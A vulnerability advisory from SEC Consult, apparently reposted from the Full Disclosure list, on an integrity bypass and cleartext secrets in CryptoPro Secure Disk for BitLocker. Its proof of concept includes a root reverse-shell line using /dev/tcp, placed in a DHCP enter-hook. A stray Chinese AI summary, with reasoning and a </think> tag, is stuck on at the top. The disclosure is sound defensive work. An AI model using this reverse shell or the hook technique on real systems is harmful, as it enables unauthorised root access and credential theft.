SEC Consult SA-20260224-0 :: Multiple vulnerabilities in CPSD CryptoPro Secure Disk for BitLocker (CVE-2025-10010)
好的,我现在需要帮用户总结一篇关于CPSD CryptoPro Secure Disk for BitLocker漏洞的文章,控制在100字以内。首先,我得仔细阅读文章内容,找出关键信息。 文章提到有两个主要漏洞:一个是完整性验证绕过(CVE-2025-10010),另一个是敏感数据明文存储。这两个漏洞都属于高危级别。攻击者可以通过绕过验证机制执行任意代码,或者获取明文数据,从而造成严重安全风险。 接下来,文章指出这些问题已经修复,补丁版本是7.6.6和7.7.1。此外,建议用户加密PBA分区作为临时解决方案,并进行全面的安全审查。 我需要把这些信息浓缩到100字以内,确保涵盖漏洞名称、影响、修复版本和建议措施。同时,避免使用“文章内容总结”等开头语,直接描述即可。 最后,检查字数是否符合要求,并确保语言简洁明了。 </think> CPSD CryptoPro Secure Disk for BitLocker 存在高危漏洞(CVE-2025-10010),包括完整性验证绕过和敏感数据明文存储问题。攻击者可利用这些漏洞执行任意代码或获取敏感信息。已发布补丁版本 7.6.6/7.7.1 修复问题,并建议加密 PBA 分区以降低风险。 2026-3-12 21:57:4 Author: seclists.org(查看原文) 阅读量:4 收藏

fulldisclosure logo

Full Disclosure mailing list archives


From: SEC Consult Vulnerability Lab via Fulldisclosure <fulldisclosure () seclists org>
Date: Tue, 24 Feb 2026 13:56:42 +0000

SEC Consult Vulnerability Lab Security Advisory < 20260224-0 >
=======================================================================
              title: Multiple vulnerabilities
            product: CPSD CryptoPro Secure Disk for BitLocker
 vulnerable version: 7.6.4.16432 (76212)
      fixed version: 7.6.6 / 7.7.1
         CVE number: CVE-2025-10010
             impact: high
           homepage:https://www.cpsd.at
              found: 2025-04-14
                 by: Gorazd Jank (Office Vienna)
                     Stefan Viehböck
                     SEC Consult Vulnerability Lab

                     An integrated part of SEC Consult, an Atos business
                     Europe | Asia

                     https://www.sec-consult.com

=======================================================================

Vendor description:
-------------------
(German)
"Das Team von CPSD entwickelt hochwertige Verschlüsselungslösungen für
sicherheitsbewusste Unternehmen. Seit über 15 Jahren stehen die CryptoPro
Produkte für beste Kundenzufriedenheit durch einen ausgewogenen Mix aus
Sicherheit, Benutzerkomfort und minimale Verwaltung.

Ihre Sicherheitsanforderungen sind bei unseren Experten in besten Händen.
Die Erfahrung aus zahlreichen Kryptographie-Projekten teilen wir gerne und
empfehlen die optimale Verschlüsselungsstrategie. Lassen Sie sich von den
Vorteilen inspirieren!"

Source:https://www.cpsd.at/


Business recommendation:
------------------------
The vendor provides patches (7.6.6/7.7.1) for the affected software which
should be installed immediately if the devices are not already patched.

In cases where patching is not feasible it is possible to encrypt the PBA
partition to prevent changes. For detailed information see chapter
Workaround below.

SEC Consult highly recommends to perform a thorough security review of the product
conducted by security professionals to identify and resolve potential further
security issues.


Vulnerability overview/description:
-----------------------------------
1) Integrity Validation Bypass (CVE-2025-10010)
The CryptoPro Secure Disk application boots a small Linux operating system
to perform user authentication before using BitLocker to decrypt the Windows
partition. The system is located on a separate unencrypted partition which can
be reached by anyone with access to the hard disk.

Multiple checks are performed to validate the integrity of the Linux operating
system and the CryptoPro Secure Disk application files. When files are changed
an error is shown on system start. One of the checks is the Linux kernel's
Integrity Measurement Architecture (IMA). It was identified that configuration
files are not validated by the IMA and can then (if not checked by other
measures) be changed. This allows an attacker to execute arbitrary code in the
context of the root user and enables an attacker to e.g., plant a backdoor
and access data during execution.

2) Cleartext storage of sensitive data
CryptoPro Secure Disk allows users who have forgotten their credentials to
contact offline as well as online support. The online version needs to
establish a connection to the support server. For this purpose, it may connect
to a predefined LAN or WLAN.

If secrets (e.g., certificates, passwords, etc.) are needed to access these
networks the corresponding configurations and files are stored in the /tmp
folder in clear text. An attacker with access to the Linux operating system can
read the secrets and use them to potentially connect to an internal network.


Proof of concept:
-----------------
1) Integrity Validation Bypass (CVE-2025-10010)
An attacker can access the unencrypted partition on the hard disk by either
booting from an external medium (e.g., USB) or by removing the hard disk and
mounting it to another system. No authentication is needed.

To bypass the IMA and get arbitrary code execution an editable configuration
file is needed which supports the execution of code and will be executed by
the system. A service meeting these preconditions is the Dynamic Host
Configuration Protocol Daemon (dhcpd). It supports Enter- and Exit-Hooks,
which are basically bash scripts which are executed when the dhcpd service is
started or respectively exited. They are being called after the initiation of
the Linux operating system.

The vulnerability can be exploited by setting up a DHCP Enter-Hook with a reverse
shell. This can be done by generating the file /etc/dhcpcd.enter-hook with
following content:

------------------------------------------------------------------------------
#!/bin/bash

bash -c 'exec bash -i &>/dev/tcp/192.168.XXX.XXX/9999 <&1' &
------------------------------------------------------------------------------

The host and the receiver of the reverse shell must be connected to each other
e.g., using a router. After the restart of the host machine a connection is
opened to the attacker's host resulting in a reverse shell with root
privileges.


2) Cleartext storage of sensitive data
To exploit this vulnerability, access to the running CryptoPro Secure system is
needed e.g., through a reverse shell. When the online support is used, the
credentials for the network are stored in clear text in the /tmp folder.
Accessing it after the start of the application – without user interaction -
is sufficient to access this information.

The figure below shows certificates as well as configuration containing clear
text credentials for the certificates. It contains the user certificate
(host.pem) and user private key (priv.pem) including the clear text password,
which can be found inside of the "wlan_supplicant_conf.wlan0" file.
There is also a tls_certs.pfx file with clear text password without
known usage. This would allow an attacker to access a user WLAN and / or
bypass 802.1x protection.

<issue2_poc_cleartext_storage_01.png>


Vulnerable / tested versions:
-----------------------------
The following version has been tested which was the latest version available
at the time of the test:
* 7.6.4.16432 (76212)


Vendor contact timeline:
------------------------
2025-06-04: Contacting vendor throughsupport () cpsd at
2025-06-04: Quick vendor response with request for information.
2025-06-10: Submission of advisory via secure platform.
2025-06-24: Response from vendor with workaround. Vendor-Clients will be informed
            and final fix will be released with version 7.6.6 / 7.7.1.
2025-06-27: Following up regarding the proposed fixed by the vendor regarding
            checksums.
2025-07-25: Information to vendor about start of advisory publication, sending
            current advisory draft to vendor.
2025-08-05: Vendor proposes adding the workaround to the business recommendation
            section.
2025-09-06: Asking the vendor when the patches have been provided to the customers.
2025-09-08: Reserving CVE-2025-10010. Vendor is still clarifying status with
            customers, requests delay of publication for a few months.
            Patch information was provided to customers on 12th August.
2026-02-19: Informing vendor about upcoming advisory release.
2026-02-24: Public release of security advisory.


Solution:
---------
The vendor provides a patch with version 7.6.6 / 7.7.1.
Encryption is activated by default starting with version 7.7.


Workaround:
-----------
Encryption of the PBA partition is possible (since version 7.6.0) and
prevents changing of the files as described in the advisory. Encryption
can be activated via "Client Security/Verschiedenes/PBA Linux Partition
verschlüsseln". Clients will be informed by the vendor about the risk if
the PBA partition is not encrypted.


Advisory URL:
-------------
https://sec-consult.com/vulnerability-lab/


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

SEC Consult Vulnerability Lab
An integrated part of SEC Consult, an Atos business
Europe | Asia

About SEC Consult Vulnerability Lab
The SEC Consult Vulnerability Lab is an integrated part of SEC Consult, an
Atos business. It ensures the continued knowledge gain of SEC Consult in the
field of network and application security to stay ahead of the attacker. The
SEC Consult Vulnerability Lab supports high-quality penetration testing and
the evaluation of new offensive and defensive technologies for our customers.
Hence our customers obtain the most current information about vulnerabilities
and valid recommendation about the risk profile of new technologies.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Interested to work with the experts of SEC Consult?
Send us your applicationhttps://sec-consult.com/career/

Interested in improving your cyber security with the experts of SEC Consult?
Contact our local officeshttps://sec-consult.com/contact/
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Mail: security-research at sec-consult dot com
Web:https://www.sec-consult.com
Blog:https://blog.sec-consult.com
X:https://x.com/sec_consult

EOF Gorazd Jank / @2026

Attachment: smime.p7s
Description: S/MIME Cryptographic Signature

_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: https://seclists.org/fulldisclosure/

Current thread:

  • SEC Consult SA-20260224-0 :: Multiple vulnerabilities in CPSD CryptoPro Secure Disk for BitLocker (CVE-2025-10010) SEC Consult Vulnerability Lab via Fulldisclosure (Mar 12)

文章来源: https://seclists.org/fulldisclosure/2026/Mar/0
如有侵权请联系:admin#unsafe.sh